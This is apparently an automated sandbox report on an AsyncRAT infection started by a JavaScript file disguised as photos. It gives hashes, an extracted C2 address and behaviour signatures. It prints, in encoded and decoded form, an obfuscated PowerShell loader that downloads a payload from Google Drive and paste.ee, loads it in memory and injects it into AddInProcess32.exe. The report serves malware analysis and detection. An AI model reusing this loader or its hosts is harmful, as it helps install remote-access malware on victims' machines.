Analysis
max time kernel: 69s
max time network: 92s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-10-2024 01:56
Static task: static1
Behavioral task: behavioral1
  Sample: Lana_Rhoades_Photoos.zip
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: Lana_Rhoades_Photoos.zip
  Resource: win10v2004-20241007-en
Behavioral task: behavioral3
  Sample: '''.exe
  Resource: win7-20240903-en
Behavioral task: behavioral4
  Sample: '''.exe
  Resource: win10v2004-20241007-en
Behavioral task: behavioral5
  Sample: Lana_Rhoades_Photoos.js
  Resource: win7-20240903-en
General
Target: Lana_Rhoades_Photoos.js
Size: 548KB
MD5: ae498935d8a61b3008bd9393a2306dec
SHA1: b1858655d705e14c01cec8d008c3f3db0a09807b
SHA256: 401f183d5553d4f01ff3a4df33524f39faa6138f40afb570300ae41ca31efc08
SHA512: 8d9830e5ff3f09099ac1e1af2a585cad2a2ad287b75117741d5f940dc2dd934e7046d17881c93b0398917d1f42a9208ab17bede62a594b1a12997d2bba660a8b
SSDEEP
3072:0F8F8F8F8F8F8F8F8F8F8F8F8F8FjFoFoFoFoFoFoFoFoFoFoFoFoFoFoFoFoFod:X7HlvYPobr777lvrFI
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Extracted
asyncrat
1.0.7
CEZER
148.113.165.11:3236
eqwe2131ewqeqwe
delay: 1
install: false
install_folder: %AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 5 IoCs
Processes:
flow  pid   process
4     1004  wscript.exe
7     1004  wscript.exe
24    4988  powershell.exe
26    4988  powershell.exe
32    4988  powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
pid   process
1924  powershell.exe
4988  powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc                                                                                                   process
Key value queried  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation  wscript.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description                          pid   process         target process
PID 4988 set thread context of 2256  4988  powershell.exe  AddInProcess32.exe
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description  ioc                                                          process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  AddInProcess32.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description             flow  ioc
HTTP User-Agent header  4     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  7     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pid   process
1924  powershell.exe
1924  powershell.exe
4988  powershell.exe
4988  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  1924  powershell.exe
Token: SeDebugPrivilege  4988  powershell.exe
Token: SeDebugPrivilege  2256  AddInProcess32.exe
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
description                       pid   process         target process
PID 1004 wrote to memory of 1924  1004  wscript.exe     powershell.exe
PID 1004 wrote to memory of 1924  1004  wscript.exe     powershell.exe
PID 1924 wrote to memory of 4988  1924  powershell.exe  powershell.exe
PID 1924 wrote to memory of 4988  1924  powershell.exe  powershell.exe
PID 4988 wrote to memory of 2256  4988  powershell.exe  AddInProcess32.exe
PID 4988 wrote to memory of 2256  4988  powershell.exe  AddInProcess32.exe
PID 4988 wrote to memory of 2256  4988  powershell.exe  AddInProcess32.exe
PID 4988 wrote to memory of 2256  4988  powershell.exe  AddInProcess32.exe
PID 4988 wrote to memory of 2256  4988  powershell.exe  AddInProcess32.exe
PID 4988 wrote to memory of 2256  4988  powershell.exe  AddInProcess32.exe
PID 4988 wrote to memory of 2256  4988  powershell.exe  AddInProcess32.exe
PID 4988 wrote to memory of 2256  4988  powershell.exe  AddInProcess32.exe
Processes
-
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Lana_Rhoades_Photoos.js
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAJwArACcAaABCAFkAdwB1AHIAIABaADQAUwA7AFQAMgBIAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgACcAKwAnAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQAnACsAJwBuAHQAOwBUADIASABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAMgAnACsAJwBIAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUADIASABpAG0AYQBnAGUAVQByAGwAKQA7AFQAMgBIAGkAbQBhACcAKwAnAGcAZQBUAGUAeAAnACsAJwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAFQAMgBIAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAMgBIAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAFMAJwArACcAVABBAFIAVAA+AD4AWgA0AFMAOwAnACsAJwBUADIASABlAG4AZABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBaACcAKwAnADQAJwArACcAUwA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVAAyAEgAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVAAyAEgAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAMgBIAGUAbgBkAEkAbgBkACcAKwAnAGUAeAAgAD0AIABUADIASABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkACcAKwAnAGUAeABPAGYAKABUADIASABlAG4AZABGAGwAYQBnACkAOwBUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFQAMgBIAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVAAyAEgAcwB0AGEAcgB0AEkAbgBkACcAKwAnAGUAeAA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAnACsAJwBUADIASABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVAAyAEgAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACcAKwAnACAAVAAyAEgAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAOwBUADIASABiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFQAMgBIAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACw
AIABUADIASABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVAAyAEgAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABWAEcAcQAgAEYAbwAnACsAJwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABUADIASABfACAAfQApAFsALQAnACsAJwAxACcAKwAnAC4ALgAtACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFQAMgBIAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0AJwArACcALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAJwArACcAaQBuAGcAKABUADIASABiAGEAcwBlADYANABSAGUAdgBlACcAKwAnAHIAcwBlAGQAKQA7AFQAMgBIAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAJwArACcAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAVAAyAEgAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AFQAMgBIAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACsAJwBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABaADQAUwBWAEEASQBaADQAUwApADsAVAAyAEgAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgAnACsAJwBvAGsAZQAoAFQAMgBIAG4AdQBsAGwALAAgAEAAKABaADQAUwAwAC8ANABLAHoAJwArACcAegB1AC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAWgA0AFMAJwArACcALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBaADQAJwArACcAUwAsACAAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAbwBaADQAUwAsACAAWgA0AFMAZABlAHMAYQB0ACcAKwAnAGkAdgBhAGQAbwBaADQAUwAnACsAJwAsAFoANABTAGQAJwArACcAZQAnACsAJwBzAGEAdABpAHYAYQAnACsAJwBkAG8AWgA0AFMALABaADQAJwArACcAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAJwArACcAbwBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALABaADQAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAMQBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMAKQApADsAJwApACAALQBDAHIAZQBQAGwAYQBDAEUAIAAgACcAVAAyAEgAJwAsAFsAQwBoAGEAUgBdADMANgAtAFIAZQBQAGwAQQBjAEUAIAAgACcAWgA0AFMAJwAsAFsAQwBoAGEAUgBdADMAOQAgAC0AQwByAGUAUABsAGEAQwBFACcAVgBHAHEAJwAsAFs
AQwBoAGEAUgBdADEAMgA0ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IEX( (('T2HimageUrl = Z4Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur Z4S;T2HwebClient = '+'New-Object System.Net.WebClie'+'nt;T2HimageBytes = T2'+'HwebClient.DownloadData(T2HimageUrl);T2Hima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetSt'+'ring(T2HimageBytes);T2HstartFlag = Z4S<<BASE64_S'+'TART>>Z4S;'+'T2HendFlag = Z4S<<BASE64_END>>Z'+'4'+'S;T2HstartIndex = T2HimageText.IndexOf(T2HstartFlag);T2HendInd'+'ex = T2HimageText.Ind'+'exOf(T2HendFlag);T2HstartIndex -'+'ge 0 -and T2HendIndex -gt T2HstartInd'+'ex;T2HstartIndex += '+'T2HstartFlag.Length;T2Hbase64Length ='+' T2HendIndex - T2HstartIndex;T2Hbas'+'e64Command = T2HimageText.Substring(T2HstartIndex, T2Hbase64Length);T2Hbase64Reversed = -join (T2Hbase64Command.'+'ToCharArray() VGq Fo'+'rEach-Object { T2H_ })[-'+'1'+'..-(T2Hbase64Command.Length)];T2HcommandBytes = [System'+'.Convert]::FromBase64Str'+'ing(T2Hbase64Reve'+'rsed);T2HloadedAssembly = [System.Reflection.Asse'+'mbly]::Load(T2HcommandBytes);T2HvaiMethod = [dnlib.IO.Home'+'].GetMethod(Z4SVAIZ4S);T2HvaiMethod.Inv'+'oke(T2Hnull, @(Z4S0/4Kz'+'zu/d/ee.etsap//:sptthZ4S'+', Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SAddInProcess32Z4'+'S, Z4SdesativadoZ4S, Z4Sdesat'+'ivadoZ4S'+',Z4Sd'+'e'+'sativa'+'doZ4S,Z4'+'SdesativadoZ4S,Z4Sdesativad'+'oZ4S,Z4SdesativadoZ4S,Z4SdesativadoZ4S,Z4S1Z4S,Z4SdesativadoZ4S));') -CrePlaCE 'T2H',[ChaR]36-RePlAcE 'Z4S',[ChaR]39 -CrePlaCE'VGq',[ChaR]124))"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2256
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 3KB
MD5: f41839a3fe2888c8b3050197bc9a0a05
SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize: 64B
MD5: 235a8eb126d835efb2e253459ab8b089
SHA1: 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256: 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512: a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82